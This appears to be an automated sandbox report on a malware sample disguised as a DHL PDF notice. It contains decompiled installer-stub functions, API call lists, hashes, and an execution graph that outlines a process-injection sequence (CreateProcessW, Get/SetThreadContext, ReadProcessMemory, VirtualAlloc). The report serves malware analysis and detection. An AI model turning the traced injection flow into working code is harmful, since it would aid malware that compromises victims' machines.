				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                            0x00401c43
                                                            0x00401c45
                                                            0x00401c4c
                                                            0x00401c4f
                                                            0x00401c52
                                                            0x00401c5c
                                                            0x00401c60
                                                            0x00401c63
                                                            0x00401c6c
                                                            0x00401c6c
                                                            0x00401c6f
                                                            0x00401c73
                                                            0x00401c7c
                                                            0x00401c7c
                                                            0x00401c7f
                                                            0x00401c83
                                                            0x00401c85
                                                            0x00401cda
                                                            0x00401cdc
                                                            0x00401ce7
                                                            0x00401cf1
                                                            0x00401cf4
                                                            0x00401cf4
                                                            0x00401cfd
                                                            0x00000000
                                                            0x00401c87
                                                            0x00401c8e
                                                            0x00401c90
                                                            0x00401c93
                                                            0x00401c99
                                                            0x00401ca0
                                                            0x00401ca3
                                                            0x00401ccb
                                                            0x00401d03
                                                            0x00401d03
                                                            0x00401ca5
                                                            0x00401cb3
                                                            0x00401cbb
                                                            0x00401cbe
                                                            0x00401cbe
                                                            0x00401ca3
                                                            0x00401d06
                                                            0x00401d09
                                                            0x00401d0f
                                                            0x00402ba4
                                                            0x00402ba4
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                            0x00406544
                                                            0x00406546
                                                            0x0040655b
                                                            0x0040655e
                                                            0x00406563
                                                            0x00406568
                                                            0x004065a6
                                                            0x004065a6
                                                            0x0040656a
                                                            0x0040657c
                                                            0x00406587
                                                            0x0040658d
                                                            0x00406598
                                                            0x00000000
                                                            0x00000000
                                                            0x00406598
                                                            0x004065ac

                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,?,?,0040679D,80000002), ref: 0040657C
                                                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728), ref: 00406587
                                                            Strings
                                                            • "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t, xrefs: 0040653D
                                                            • ('B, xrefs: 0040655B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$('B
                                                            • API String ID: 3356406503-2556636245
                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                            0x00405f38
                                                            0x00405f45
                                                            0x00405f46
                                                            0x00405f51
                                                            0x00405f59
                                                            0x00405f59
                                                            0x00405f61

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3916508600
                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 89%
                                                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                            0x00405642
                                                            0x0040564c
                                                            0x00405668
                                                            0x0040568a
                                                            0x0040568d
                                                            0x00405693
                                                            0x0040569d
                                                            0x0040569e
                                                            0x004056a0
                                                            0x004056a6
                                                            0x004056a6
                                                            0x004056b0
                                                            0x00000000
                                                            0x004056be
                                                            0x00405675
                                                            0x004056ad
                                                            0x004056ad
                                                            0x00000000
                                                            0x004056ad
                                                            0x00405681
                                                            0x00405683
                                                            0x00000000
                                                            0x00405683
                                                            0x00405652
                                                            0x00000000
                                                            0x00000000
                                                            0x00405659
                                                            0x00000000

                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0040566D
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                            0x00405f84
                                                            0x00405f8e
                                                            0x00405f91
                                                            0x00405f97
                                                            0x00405f98
                                                            0x00405f99
                                                            0x00405fa1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405fa1
                                                            0x00405fa3
                                                            0x00405fab

                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Notice_pdf.exe,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 00405F89
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Notice_pdf.exe,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 00405F99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-1669384263
                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                            0x004060cd
                                                            0x004060cf
                                                            0x004060d2
                                                            0x004060fe
                                                            0x004060d7
                                                            0x004060e0
                                                            0x004060e5
                                                            0x004060f0
                                                            0x004060f3
                                                            0x0040610f
                                                            0x004060f5
                                                            0x004060fc
                                                            0x00000000
                                                            0x004060fc
                                                            0x00406108
                                                            0x0040610c
                                                            0x0040610c
                                                            0x00406106
                                                            0x00000000

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:63.5%
                                                            Dynamic/Decrypted Code Coverage:92.5%
                                                            Signature Coverage:15.8%
                                                            Total number of Nodes:120
                                                            Total number of Limit Nodes:10
                                                            execution_graph 487 401000 __set_app_type __p__fmode __p__commode 488 40106e 487->488 489 401083 488->489 490 401077 __setusermatherr 488->490 495 401110 _controlfp 489->495 490->489 492 401088 _initterm __getmainargs _initterm __p___initenv 496 401130 8 API calls 492->496 495->492 497 4011d9 496->497 498 420a26 499 420a2d 498->499 500 420a39 499->500 502 420ee1 ExitProcess 499->502 503 42020a 499->503 518 42005f GetPEB 503->518 505 420218 506 4203b3 505->506 507 4203c1 CreateProcessW 505->507 511 4203eb 505->511 512 42144a 11 API calls 505->512 515 420675 SetThreadContext 505->515 517 42129b 11 API calls 505->517 519 421330 505->519 528 4210e9 505->528 537 4211ea 505->537 506->499 508 4203f0 GetThreadContext 507->508 507->511 509 420410 ReadProcessMemory 508->509 508->511 509->505 509->511 511->506 546 42129b 511->546 512->505 515->505 515->511 517->505 518->505 520 42134b 519->520 555 42013e GetPEB 520->555 522 42136c 523 421424 522->523 524 421374 522->524 572 421776 523->572 557 420eea 524->557 527 42140b 527->505 529 421104 528->529 530 42013e GetPEB 529->530 531 421125 530->531 532 4211b7 531->532 533 42112d 531->533 582 42179a 532->582 534 420eea 10 API calls 533->534 536 42119e 534->536 536->505 538 421205 537->538 539 42013e GetPEB 538->539 540 421226 539->540 541 421270 540->541 542 42122a 540->542 585 4217ac 541->585 544 420eea 10 API calls 542->544 545 421265 544->545 545->505 547 4212ae 546->547 548 42013e GetPEB 547->548 549 4212cf 548->549 550 4212d3 549->550 551 421319 549->551 552 420eea 10 API calls 550->552 588 421764 551->588 554 42130e 552->554 554->506 556 420160 555->556 556->522 575 42005f GetPEB 557->575 559 420f33 576 420109 GetPEB 559->576 562 420fc0 563 420fd1 VirtualAlloc 562->563 566 421095 562->566 564 420fe7 ReadFile 563->564 563->566 565 420ffc VirtualAlloc 564->565 564->566 565->566 569 42101d 565->569 567 4210d3 VirtualFree 566->567 568 4210de 566->568 567->568 568->527 569->566 570 421084 FindCloseChangeNotification 569->570 571 421088 VirtualFree 569->571 570->571 571->566 573 420eea 10 API calls 572->573 574 421780 573->574 574->527 575->559 577 42011c 576->577 579 420131 CreateFileW 577->579 580 42017b GetPEB 577->580 579->562 579->566 581 42019f 580->581 581->577 583 420eea 10 API calls 582->583 584 4217a4 583->584 584->536 586 420eea 10 API calls 585->586 587 4217b6 586->587 587->545 589 420eea 10 API calls 588->589 590 42176e 589->590 590->554 632 401104 _exit 591 4208b7 603 42005f GetPEB 591->603 593 420912 604 420838 593->604 595 42091a 596 4209ad 595->596 597 4209c9 CreateFileW 595->597 597->596 598 4209f3 VirtualAlloc ReadFile 597->598 598->596 601 420a20 598->601 599 420a39 600 42020a 15 API calls 600->601 601->599 601->600 602 420ee1 ExitProcess 601->602 603->593 617 42005f GetPEB 604->617 606 42084c 618 42005f GetPEB 606->618 608 42085f 619 42005f GetPEB 608->619 610 420872 620 4207da 610->620 612 420880 613 42089c VirtualAllocExNuma 612->613 614 4208a9 613->614 625 42073a 614->625 617->606 618->608 619->610 630 42005f GetPEB 620->630 622 4207ea 623 4207f0 GetSystemInfo 622->623 624 42081b 623->624 624->612 631 42005f GetPEB 625->631 627 420746 628 420766 VirtualAlloc 627->628 629 420783 628->629 629->595 630->622 631->627 633 4217be 634 420eea 10 API calls 633->634 635 4217c8 634->635

                                                            Callgraph

                                                            • Executed
                                                            • Not Executed
                                                            • Opacity -> Relevance
                                                            • Disassembly available
                                                            callgraph 0 Function_00401000 10 Function_00401110 0->10 20 Function_00401125 0->20 30 Function_00401130 0->30 1 Function_00420001 2 Function_00421741 3 Function_00401104 4 Function_00420005 5 Function_0042020A 6 Function_0042144A 5->6 13 Function_004200DA 5->13 15 Function_0042129B 5->15 16 Function_0042005F 5->16 25 Function_004211EA 5->25 27 Function_004210E9 5->27 32 Function_00420073 5->32 33 Function_00421330 5->33 7 Function_00421788 6->7 21 Function_00421627 6->21 26 Function_00420EEA 6->26 41 Function_0042013E 6->41 17 Function_0042175F 7->17 7->26 8 Function_00420109 39 Function_0042017B 8->39 9 Function_0042174E 11 Function_00401216 12 Function_004207DA 12->16 12->32 14 Function_0042179A 14->17 14->26 15->21 24 Function_00421764 15->24 15->26 15->41 18 Function_00401122 19 Function_00420A26 19->5 23 Function_004215E4 21->23 36 Function_004216F6 21->36 22 Function_00420827 24->17 24->26 25->21 25->26 29 Function_004217AC 25->29 25->41 26->8 26->13 26->16 26->32 27->14 27->21 27->26 27->41 28 Function_0042082F 29->17 29->26 31 Function_00421732 31->2 32->4 33->21 33->26 35 Function_00421776 33->35 33->41 34 Function_00420031 35->17 35->26 37 Function_004208B7 37->5 37->16 37->32 40 Function_00420838 37->40 38 Function_0042073A 38->16 38->32 39->32 40->12 40->16 40->28 40->32 40->38 41->32 42 Function_004217BE 42->17 42->26

                                                            Executed Functions

                                                            Function 004208B7 Relevance: 6.5, APIs: 4, Instructions: 486COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 184 4208b7-4209ab call 42005f call 420838 call 420073 * 8 206 4209b2-4209c2 184->206 207 4209ad 184->207 210 4209c4 206->210 211 4209c9-4209ec CreateFileW 206->211 208 420ee6-420ee9 207->208 210->208 212 4209f3-420a19 VirtualAlloc ReadFile 211->212 213 4209ee 211->213 214 420a20-420a33 212->214 215 420a1b 212->215 213->208 217 420ed0-420edf call 42020a 214->217 218 420a39-420ecb 214->218 215->208 221 420ee1-420ee3 ExitProcess 217->221
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: AllocNumaVirtual
                                                            • String ID:
                                                            • API String ID: 4233825816-0
                                                            • Opcode ID: 45ccf47f97950f780e34278eb1c0095043e0ea22b598778c2579e9b66a61e680
                                                            • Instruction ID: feb01ae73c05315a2f2661747642a0421ea82d5dadaa70ec78252cb21e0edcf1
                                                            • Opcode Fuzzy Hash: 45ccf47f97950f780e34278eb1c0095043e0ea22b598778c2579e9b66a61e680
                                                            • Instruction Fuzzy Hash: 4B226460D5D2E8ADDF06CBE994517FDBFB05E26202F0845DAE0E5A5283C13A834E9B25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004207DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
